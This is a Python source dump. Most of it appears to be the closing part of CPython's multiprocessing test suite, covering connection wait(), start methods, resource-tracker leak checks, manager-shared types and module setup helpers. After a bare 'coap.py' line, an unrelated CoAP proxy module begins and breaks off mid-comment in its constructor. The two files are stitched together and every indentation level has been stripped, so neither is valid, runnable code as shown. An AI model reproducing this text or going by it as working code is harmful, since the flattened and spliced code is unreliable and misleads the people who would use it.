r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((test.support.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
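# wait() may return Connection objects and integer sentinels mixed together,
# which are not mutually orderable, so results are compared after sorting by
# id() to get a deterministic order.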
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
# We recursively start processes. Issue #17555 meant that the
# after fork registry would get duplicate entries for the same
# lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['fork', 'spawn', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
#
# Check that killing process does not leak named semaphores
#
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
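# The {w} and {rtype} placeholders in the template above are filled in via
# str.format() below; the doubled braces ({{}}) survive formatting as literal
# braces in the child's error message.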
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
# The pid should be None in the child process, except for the fork
# context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
o.wait(0.001)
@classmethod
def _test_lock(cls, obj):
obj.acquire()
def test_lock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_lock, o)
o.release()
self.assertRaises(RuntimeError, o.release) # already released
@classmethod
def _test_rlock(cls, obj):
obj.acquire()
obj.release()
def test_rlock(self, lname="Lock"):
o = getattr(self.manager, lname)()
self.run_worker(self._test_rlock, o)
@classmethod
def _test_semaphore(cls, obj):
obj.acquire()
def test_semaphore(self, sname="Semaphore"):
o = getattr(self.manager, sname)()
self.run_worker(self._test_semaphore, o)
o.release()
def test_bounded_semaphore(self):
self.test_semaphore(sname="BoundedSemaphore")
@classmethod
def _test_condition(cls, obj):
obj.acquire()
obj.release()
def test_condition(self):
o = self.manager.Condition()
self.run_worker(self._test_condition, o)
@classmethod
def _test_barrier(cls, obj):
assert obj.parties == 5
obj.reset()
def test_barrier(self):
o = self.manager.Barrier(5)
self.run_worker(self._test_barrier, o)
@classmethod
def _test_pool(cls, obj):
# TODO: fix https://bugs.python.org/issue35919
with obj:
pass
def test_pool(self):
o = self.manager.Pool(processes=4)
self.run_worker(self._test_pool, o)
@classmethod
def _test_queue(cls, obj):
assert obj.qsize() == 2
assert obj.full()
assert not obj.empty()
assert obj.get() == 5
assert not obj.empty()
assert obj.get() == 6
assert obj.empty()
def test_queue(self, qname="Queue"):
o = getattr(self.manager, qname)(2)
o.put(5)
o.put(6)
self.run_worker(self._test_queue, o)
assert o.empty()
assert not o.full()
def test_joinable_queue(self):
self.test_queue("JoinableQueue")
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.count(5) == 1
assert obj.index(5) == 0
obj.sort()
obj.reverse()
for x in obj:
pass
assert len(obj) == 1
assert obj.pop(0) == 5
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_dict(cls, obj):
assert len(obj) == 1
assert obj['foo'] == 5
assert obj.get('foo') == 5
assert list(obj.items()) == [('foo', 5)]
assert list(obj.keys()) == ['foo']
assert list(obj.values()) == [5]
assert obj.copy() == {'foo': 5}
assert obj.popitem() == ('foo', 5)
def test_dict(self):
o = self.manager.dict()
o['foo'] = 5
self.run_worker(self._test_dict, o)
assert not o
self.assertEqual(len(o), 0)
@classmethod
def _test_value(cls, obj):
assert obj.value == 1
assert obj.get() == 1
obj.set(2)
def test_value(self):
o = self.manager.Value('i', 1)
self.run_worker(self._test_value, o)
self.assertEqual(o.value, 2)
self.assertEqual(o.get(), 2)
@classmethod
def _test_array(cls, obj):
assert obj[0] == 0
assert obj[1] == 1
assert len(obj) == 2
assert list(obj) == [0, 1]
def test_array(self):
o = self.manager.Array('i', [0, 1])
self.run_worker(self._test_array, o)
@classmethod
def _test_namespace(cls, obj):
assert obj.x == 0
assert obj.y == 1
def test_namespace(self):
o = self.manager.Namespace()
o.x = 0
o.y = 1
self.run_worker(self._test_namespace, o)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
# Just make sure names in blacklist are excluded
support.check__all__(self, multiprocessing, extra=multiprocessing.__all__,
blacklist=['SUBDEBUG', 'SUBWARNING'])
#
# Mixins
#
class BaseMixin(object):
@classmethod
def setUpClass(cls):
cls.dangling = (multiprocessing.process._dangling.copy(),
threading._dangling.copy())
@classmethod
def tearDownClass(cls):
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
processes = set(multiprocessing.process._dangling) - set(cls.dangling[0])
if processes:
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(cls.dangling[1])
if threads:
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
class ProcessesMixin(BaseMixin):
TYPE = 'processes'
Process = multiprocessing.Process
connection = multiprocessing.connection
current_process = staticmethod(multiprocessing.current_process)
parent_process = staticmethod(multiprocessing.parent_process)
active_children = staticmethod(multiprocessing.active_children)
Pool = staticmethod(multiprocessing.Pool)
Pipe = staticmethod(multiprocessing.Pipe)
Queue = staticmethod(multiprocessing.Queue)
JoinableQueue = staticmethod(multiprocessing.JoinableQueue)
Lock = staticmethod(multiprocessing.Lock)
RLock = staticmethod(multiprocessing.RLock)
Semaphore = staticmethod(multiprocessing.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.BoundedSemaphore)
Condition = staticmethod(multiprocessing.Condition)
Event = staticmethod(multiprocessing.Event)
Barrier = staticmethod(multiprocessing.Barrier)
Value = staticmethod(multiprocessing.Value)
Array = staticmethod(multiprocessing.Array)
RawValue = staticmethod(multiprocessing.RawValue)
RawArray = staticmethod(multiprocessing.RawArray)
class ManagerMixin(BaseMixin):
TYPE = 'manager'
Process = multiprocessing.Process
Queue = property(operator.attrgetter('manager.Queue'))
JoinableQueue = property(operator.attrgetter('manager.JoinableQueue'))
Lock = property(operator.attrgetter('manager.Lock'))
RLock = property(operator.attrgetter('manager.RLock'))
Semaphore = property(operator.attrgetter('manager.Semaphore'))
BoundedSemaphore = property(operator.attrgetter('manager.BoundedSemaphore'))
Condition = property(operator.attrgetter('manager.Condition'))
Event = property(operator.attrgetter('manager.Event'))
Barrier = property(operator.attrgetter('manager.Barrier'))
Value = property(operator.attrgetter('manager.Value'))
Array = property(operator.attrgetter('manager.Array'))
list = property(operator.attrgetter('manager.list'))
dict = property(operator.attrgetter('manager.dict'))
Namespace = property(operator.attrgetter('manager.Namespace'))
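# Each property above resolves through operator.attrgetter('manager.<name>'),
# so attribute access on a test instance is forwarded at call time to the
# class-level SyncManager created in setUpClass().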
@classmethod
def Pool(cls, *args, **kwds):
return cls.manager.Pool(*args, **kwds)
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.manager = multiprocessing.Manager()
@classmethod
def tearDownClass(cls):
# only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
gc.collect() # do garbage collection
if cls.manager._number_of_objects() != 0:
# This is not really an error since some tests do not
# ensure that all processes which hold a reference to a
# managed object have been joined.
test.support.environment_altered = True
support.print_warning('Shared objects which still exist '
'at manager shutdown:')
support.print_warning(cls.manager._debug_info())
cls.manager.shutdown()
cls.manager.join()
cls.manager = None
super().tearDownClass()
class ThreadsMixin(BaseMixin):
TYPE = 'threads'
Process = multiprocessing.dummy.Process
connection = multiprocessing.dummy.connection
current_process = staticmethod(multiprocessing.dummy.current_process)
active_children = staticmethod(multiprocessing.dummy.active_children)
Pool = staticmethod(multiprocessing.dummy.Pool)
Pipe = staticmethod(multiprocessing.dummy.Pipe)
Queue = staticmethod(multiprocessing.dummy.Queue)
JoinableQueue = staticmethod(multiprocessing.dummy.JoinableQueue)
Lock = staticmethod(multiprocessing.dummy.Lock)
RLock = staticmethod(multiprocessing.dummy.RLock)
Semaphore = staticmethod(multiprocessing.dummy.Semaphore)
BoundedSemaphore = staticmethod(multiprocessing.dummy.BoundedSemaphore)
Condition = staticmethod(multiprocessing.dummy.Condition)
Event = staticmethod(multiprocessing.dummy.Event)
Barrier = staticmethod(multiprocessing.dummy.Barrier)
Value = staticmethod(multiprocessing.dummy.Value)
Array = staticmethod(multiprocessing.dummy.Array)
#
# Functions used to create test cases from the base ones in this module
#
def install_tests_in_module_dict(remote_globs, start_method):
__module__ = remote_globs['__name__']
local_globs = globals()
ALL_TYPES = {'processes', 'threads', 'manager'}
for name, base in local_globs.items():
if not isinstance(base, type):
continue
if issubclass(base, BaseTestCase):
if base is BaseTestCase:
continue
assert set(base.ALLOWED_TYPES) <= ALL_TYPES, base.ALLOWED_TYPES
for type_ in base.ALLOWED_TYPES:
newname = 'With' + type_.capitalize() + name[1:]
Mixin = local_globs[type_.capitalize() + 'Mixin']
class Temp(base, Mixin, unittest.TestCase):
pass
Temp.__name__ = Temp.__qualname__ = newname
Temp.__module__ = __module__
remote_globs[newname] = Temp
elif issubclass(base, unittest.TestCase):
class Temp(base, object):
pass
Temp.__name__ = Temp.__qualname__ = name
Temp.__module__ = __module__
remote_globs[name] = Temp
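# For example, a base class _TestHeap with ALLOWED_TYPES == ('processes',)
# is re-exported into the importing module as WithProcessesTestHeap, mixing
# the base tests with ProcessesMixin.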
dangling = [None, None]
old_start_method = [None]
def setUpModule():
multiprocessing.set_forkserver_preload(PRELOAD)
multiprocessing.process._cleanup()
dangling[0] = multiprocessing.process._dangling.copy()
dangling[1] = threading._dangling.copy()
old_start_method[0] = multiprocessing.get_start_method(allow_none=True)
try:
multiprocessing.set_start_method(start_method, force=True)
except ValueError:
raise unittest.SkipTest(start_method +
' start method not supported')
if sys.platform.startswith("linux"):
try:
lock = multiprocessing.RLock()
except OSError:
raise unittest.SkipTest("OSError raises on RLock creation, "
"see issue 3111!")
check_enough_semaphores()
util.get_temp_dir() # creates temp directory
multiprocessing.get_logger().setLevel(LOG_LEVEL)
def tearDownModule():
need_sleep = False
# bpo-26762: Some multiprocessing objects like Pool create reference
# cycles. Trigger a garbage collection to break these cycles.
test.support.gc_collect()
multiprocessing.set_start_method(old_start_method[0], force=True)
# pause a bit so we don't get warning about dangling threads/processes
processes = set(multiprocessing.process._dangling) - set(dangling[0])
if processes:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling processes: {processes}')
processes = None
threads = set(threading._dangling) - set(dangling[1])
if threads:
need_sleep = True
test.support.environment_altered = True
support.print_warning(f'Dangling threads: {threads}')
threads = None
# Sleep 500 ms to give time to child processes to complete.
if need_sleep:
time.sleep(0.5)
multiprocessing.util._cleanup_tests()
remote_globs['setUpModule'] = setUpModule
remote_globs['tearDownModule'] = tearDownModule
coap.py
import logging
import logging.config
import os
import random
import re
import socket
import threading
import xml.etree.ElementTree as ElementTree
import struct
from coapclient import HelperClient
from coapthon.layers.forwardLayer import ForwardLayer
from coapthon.messages.message import Message
from coapthon import defines
from coapthon.resources.remoteResource import RemoteResource
from coapthon.utils import Tree, create_logging
from coapthon.layers.blocklayer import BlockLayer
from coapthon.layers.observelayer import ObserveLayer
from coapthon.layers.requestlayer import RequestLayer
from coapthon.layers.resourcelayer import ResourceLayer
from coapthon.layers.cachelayer import CacheLayer
from coapthon.messages.request import Request
from coapthon.layers.messagelayer import MessageLayer
from coapthon.resources.resource import Resource
from coapthon.serializer import Serializer
if not os.path.isfile("logging.conf"):
create_logging()
logger = logging.getLogger(__name__)
logging.config.fileConfig("logging.conf", disable_existing_loggers=False)
class CoAP(object):
def __init__(self, server_address, xml_file, multicast=False, starting_mid=None):
self.stopped = threading.Event()
self.stopped.clear()
self.to_be_stopped = []
        # Keep the thread object under its own name so it does not shadow the purge() method.
        self._purge_thread = threading.Thread(target=self.purge)
        self._purge_thread.start()
self._messageLayer = MessageLayer(starting_mid)
self._blockLayer = BlockLayer()
self._observeLayer = ObserveLayer()
        self._forwardLayer = ForwardLayer(self)
        # receive_datagram() checks for a cache layer; default to None so the proxy
